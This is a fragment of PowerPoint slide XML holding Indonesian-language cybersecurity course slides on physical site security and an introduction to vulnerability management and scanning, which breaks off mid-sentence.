              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Amankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tonggak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kloning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/skimming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CCTV, dan drone/UAV, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengesahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</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172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130591452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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
